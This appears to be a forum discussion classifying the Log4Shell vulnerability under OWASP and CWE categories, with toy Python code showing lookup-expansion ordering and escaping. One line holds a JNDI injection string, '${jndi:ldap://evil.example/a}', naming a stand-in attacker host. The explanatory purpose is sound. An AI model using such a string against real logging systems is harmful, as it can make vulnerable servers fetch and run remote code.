Part of the problem is (AIUI) that expansion of `${}`-type constructs is carried out after parameters are inserted into the log message's format string. I don't believe the use case requires that; I think it was just easier to implement. If that expansion were done on the format string, before parameters were inserted, this attack would not be possible. Injecting dodgy strings into log messages as archi42 suggests would also not be a problem if the insertion were done safely.
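To make the ordering point concrete, here is a toy model in Python. It is not log4j's code or API: the `LOOKUPS` table, the function names and the `evil.example` URL are all made up for illustration, and the "lookup" just returns a marker string instead of doing anything. It only shows why expanding before versus after parameter insertion matters.

```python
import re

# Hypothetical lookup table standing in for a logger's ${...} lookups.
# The values are plain marker strings; nothing is fetched or executed.
LOOKUPS = {
    "env:USER": "alice",
    "jndi:ldap://evil.example/a": "<remote lookup performed>",
}

_LOOKUP_RE = re.compile(r"\$\{([^}]*)\}")
_PLACEHOLDER_RE = re.compile(r"\{\}")


def expand_lookups(text):
    """Replace each ${key} with its lookup value; unknown keys stay as-is."""
    return _LOOKUP_RE.sub(lambda m: LOOKUPS.get(m.group(1), m.group(0)), text)


def insert_params(fmt, params):
    """Fill each {} placeholder, left to right, with the next parameter."""
    remaining = iter(params)
    return _PLACEHOLDER_RE.sub(lambda m: str(next(remaining, m.group(0))), fmt)


def log_expand_last(fmt, *params):
    """Insert parameters first, then expand: parameters get interpreted too."""
    return expand_lookups(insert_params(fmt, params))


def log_expand_first(fmt, *params):
    """Expand the format string first, then insert: parameters stay inert."""
    return insert_params(expand_lookups(fmt), params)


attacker_input = "${jndi:ldap://evil.example/a}"
print(log_expand_last("user=${env:USER} agent={}", attacker_input))
print(log_expand_first("user=${env:USER} agent={}", attacker_input))
```

In the second ordering the `${env:USER}` written by the developer still expands, but the attacker's string ends up in the output as literal text.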
Agreed that this is not a sanitisation attack, but I think that means it is a format string attack:
Hah, linking to OWASP is a good point. I have now put some more thought into "how would I EXACTLY classify this, if I had to list it as a finding for a customer".
Now, I think format string is not entirely right, either. That's more related to `printf`, which splits code (the format string) and data (the varargs). But log4j actually mixes code and data into one string. In the OWASP framework, I think the more generic variant of format string attacks would be https://owasp.org/www-community/attacks/Code_Injection (that's actually linked under "related" for the format string attacks).
OWASP lives mostly in the web world, but links to CWE-77 (Command Injection, https://cwe.mitre.org/data/definitions/77.html), which is pretty generic. And log4shell matches the description just nicely: 1. Data from untrusted source: yes; 2. data is part of a string that's executed: interpreted, which I think qualifies as a yes; 3. the execution gives capabilities the attacker would not have otherwise: oh yes!
So it's probably safe to claim that this could fall under CWE-77 (too bad CVEs rarely use CWEs).
Now, CWE-77 (Command Injection) is a child of "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')" https://cwe.mitre.org/data/definitions/74.html. Which states "The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities." - that's probably why both of us thought of these two! :) And even if CWE-77 is too specialized (this could be argued), CWE-74 should be a good match, quoting CWE-74: "The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component" [end quote].
Funnily, CWE-74 is a child of https://cwe.mitre.org/data/definitions/707.html - "Improper Neutralization". Which says neutralization can be done by (among others): "[...] transformation of the input/output to be "safe" using techniques such as filtering, encoding/decoding, escaping/unescaping, quoting/unquoting, or canonicalization [...]"
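As a rough illustration of the "escaping/unescaping" option from that list, here is a small Python sketch. The `$$` escape convention, the `LOOKUPS` table and the function names are my own assumptions for the example; this is not how log4j handles escaping, just a toy interpreter where untrusted input is neutralized before it is mixed into the string that gets interpreted.

```python
import re

# Hypothetical lookup table; a real logger would have many more sources.
LOOKUPS = {"env:USER": "alice"}

# Assumed convention for this sketch: "$$" is an escaped literal "$",
# and "${key}" is a lookup to be expanded.
_TOKEN_RE = re.compile(r"\$\$|\$\{([^}]*)\}")


def escape(untrusted):
    """Neutralize the special character by doubling every '$'."""
    return untrusted.replace("$", "$$")


def expand(text):
    """Expand ${key} lookups and turn each escaped '$$' back into '$'."""
    def repl(match):
        if match.group(0) == "$$":
            return "$"
        return LOOKUPS.get(match.group(1), match.group(0))
    return _TOKEN_RE.sub(repl, text)


untrusted = "${env:USER}"
print(expand("user=${env:USER} agent=" + untrusted))          # interpreted
print(expand("user=${env:USER} agent=" + escape(untrusted)))  # kept literal
```

The catch, as with SQL escaping, is that every insertion point has to remember to call `escape`, which is why keeping code and data separate in the first place is usually the more robust fix.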
Agreed that this is not a sanitisation attack, but I think that means it is a format string attack:
https://owasp.org/www-community/attacks/Format_string_attack
It requires a couple of other loopholes, related to JNDI, to work, but that is the first step which goes wrong.